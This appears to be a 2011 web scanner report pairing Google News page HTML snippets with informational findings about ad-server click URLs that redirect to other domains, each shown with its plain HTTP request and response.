<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/nDfXuLMkVhCuOM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEW9WCHK4yVIzY7YU49PFGPQMbJVA " href="http://www.nytimes.com/2011/01/25/world/middleeast/25israel.html" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3AGVHcnCKws">Video: 
Hezbollah wants national unity government
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/hezbollah-backed-candidate-lebanon-pm" target="_blank" class="usg-AFQjCNFd_sxRNnRB9acSagaGcnxPwcjqNQ " id="MAA4AEgVUAFgAmoCdXM">Hezbollah-backed candidate poised to become Lebanon PM</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4eXowgPSlua1VqG8Nf0LMONQahQ " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12267758" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzPnrFXiqbLghRyezzQRMq7Vz9Gg " href="http://www.reuters.com/article/idUSTRE70N33820110124" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/globe-investor/american-express-revenue-rises-13-per-cent/article1881303/" class="usg-AFQjCNGQH_PAD0kP3hmk5sNmfexx-KuxFQ " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/fXOebJLaR-M2pM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/globe-investor/american-express-revenue-rises-13-per-cent/article1881303/" class="usg-AFQjCNGQH_PAD0kP3hmk5sNmfexx-KuxFQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHR-Papxe37QtxuLRJAJTk8ZAj5ww " href="http://www.foxbusiness.com/markets/2011/01/24/amex-q-profit-surges-improved-spending/" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/BT-CO-20110124-714199.html" target="_blank" class="usg-AFQjCNGZ6fkKff0JkSroHsp9vLD_nXlG6w " id="MAA4AEgWUAFgAmoCdXM">American Express 4Q Net Jumps 48%; Loss Provisions Cut</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSTRE70N6K220110124" target="_blank" class="usg-AFQjCNHCcliRpS-FAzKWpoedzHlk6cVgYQ " id="MAA4AEgWUAJgAmoCdXM">American Express 4th-quarter revenue rises 13 percent</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2OHHOGYc_oE7NmaP9FHOpQc6DgA " href="http://www.marketwatch.com/story/amex-quarterly-profit-jumps-44-2011-01-24" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEqe4r8926Yq7SOfQoNlc5kO4KKsA " href="http://www.bloomberg.com/news/2011-01-24/american-express-profit-climbs-48-as-credit-card-spending-reaches-record.html" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTMS3txWzK91nm7iQNLB3viWDKng " href="http://www.thestreet.com/story/10983446/1/american-express-profits-up.html?cm_ven=GOOGLEN" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHiERdzKjGz_owcJAKwYgaq2jAmhQ " href="http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1" id="-9130425399277123681"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUIAy8iUF8AYKI9an-TtV9uy8Ftw " href="http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/" id="415738970037031730"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="1857102735582363016"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEK2ud_k0F8qRyqgsh-kAYgITivyQ " href="http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEYW-eOsdylgGuCJv1odl_DRoolHg " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE64Ep_yxeXZUqNQV9MB1-njgF7pQ " href="http://voices.washingtonpost.com/capitalsinsider/new-york-rangers/capitals-seek-more-than-redemp.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUVFbVVUXTIHlz-l1C5dBB5sKdxg " href="http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8qeVdzvBEnfzEKH7vE3_vwVQTqg " href="http://www.naturalnews.com/031076_USDA_bird_deaths.html" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF2Ndq7u1NFQAEeGnztrLOHGBXwVA " href="http://online.wsj.com/article/SB10001424052748703954004576090020541379588.html" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGblh1wTgbZsSv-VYZXiNbBHiKNXw " href="http://news.nationalgeographic.com/news/2011/01/110119-yellowstone-park-supervolcano-eruption-magma-science/" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFox8ILKO8us5SSJskhPVJPFB3IJQ " href="http://www.wired.com/epicenter/2011/01/google-voice-lsd-trip/" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHyWl3EN4CNcBZDRvx0uWAGqRTn-w " href="http://www.bbc.co.uk/news/uk-12225163" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGGQHDo9ynACtTjJAIzBv77Y3Il_g " href="http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEge-ZTK-NGgKR5GGl5cueoZK1MNQ " href="http://www.cnn.com/2011/WORLD/europe/01/21/femen.topless.protest/" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE5JHQ3Gv91XCD5GZEafo-YjxGefA " href="http://www.nytimes.com/2011/01/22/your-money/401ks-and-similar-plans/22money.html" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFqlgKE7z1GSfD-_OAHlbbllpcUzA " href="http://online.wsj.com/article/SB10001424052748703951704576092371207903438.html" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHZbk8n6TInb7AFBrRghx7rtQNorw " href="http://www.nascar.com/news/110120/preseason-thunder-daytona-tstewart-jjohnson-dhamlin-cedwards/" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEdtmVNLHhQzK5b8i2ymGRHBdQgJw " href="http://www.nytimes.com/2011/01/23/books/review/Paul-t.html" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Domodedovo blast masterminds proud of terror 'fundraiser' - Peter Lavelle</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">NBA TV Top 5: January 23rd</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Sport Science: Devin Hester Vs. A Black Bear</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=jKYkFgMz7fQ">Raw Video: Deadly Explosion at Moscow Airport</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=jKYkFgMz7fQ">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/RC1jTMh02O0/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/RC1jTMh02O0/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=RC1jTMh02O0">Police: Multiple Fla. Officers Shot</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=RC1jTMh02O0">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHH_B8Vhlsac2V2jAPJyKDuyVeAAA " href="http://mashable.com/2011/01/24/engaging-facebook-fans/" id="-7258938783345423075"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2LifoZ2DaEkfGjsc9kMMPnJB2kg " href="http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml" id="-7252428281190763667"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEPdEfqF2nkQ1qDcAFFpZusUDt9tA " href="http://www.reuters.com/article/idUSTRE70N2TQ20110124" id="5335316056229417362"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNENgV2GEqlhUgEGu5EME68UcyGRvw " href="http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/" id="-6685976054251165433"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE9LKKsqu443-DV8lm4q72snzhdWw " href="http://www.nytimes.com/2011/01/24/technology/24cook.html" id="3851731467917620472"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNF0sJpX5iFReuTSkI-eJ2x5QatHcA " href="http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln" id="-6745807016666702947"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFu_9RyhYijNKzwJqwfe2g-y3O7vA " href="http://www.chicagotribune.com/news/local/breaking/chibrknews-court-rules-against-emanuel-on-01242011,0,4083659.story" id="6711712754283306360"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHT_jvJT_yNF5cx8BE3V88ObIMsfQ " href="http://online.wsj.com/article/SB10001424052748704881304576094000352599050.html" id="3419897226598733059"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHe-laFgexyFrmfE7lXlS-da3UXCA " href="http://mashable.com/2011/01/20/google-offers/" id="-2235673424111835580"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsz7_xejPP6VsD3NuWdHvxda40Kg " href="http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html" id="1375770744202528156"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGLZSeleCrQ4gBas6xZiwZUPYDCYQ " href="http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html" id="-6583013401083455589"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIKm4Fup2J5xjAnEf8e9q0nfSP0Q " href="http://www.nytimes.com/2011/01/18/opinion/18brooks.html" id="5024855345474111787"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIqQNaGnqPT81jx2kLrr0Da_XsHg " href="http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln" id="6107526647097459892"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEQX0__xR6F03eNBD80wQ9ztviVrQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html" id="6905605053023830163"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHmXxgsr2Peqa9XqIE5wJgWC0cf0w " href="http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162" id="-8119849514259291457"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="7279004896616451596"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG6VFJsd5LghOJQDRVmX0-Z39bpvg " href="http://mashable.com/2011/01/12/obsessed-with-facebook-infographic/" id="-5027991129252007488"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGefgxSphxOT7DWIJfYen2FHqVKeA " href="http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html" id="2526493708698605676"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEBCqmXL7Go4fAtoGveE-Ftib_JTA " href="http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html" id="5830623823895293286"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEkadxsOjF3ACMoM7ayuBEhtjIiRw " href="http://www.wired.com/threatlevel/2011/01/twitter/" id="-198025857784313602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEK4OuQ5vLuSdUivCvstxdy78zHhA " href="http://www.slate.com/id/2281146/" id="-303322691301458140"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a> - <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
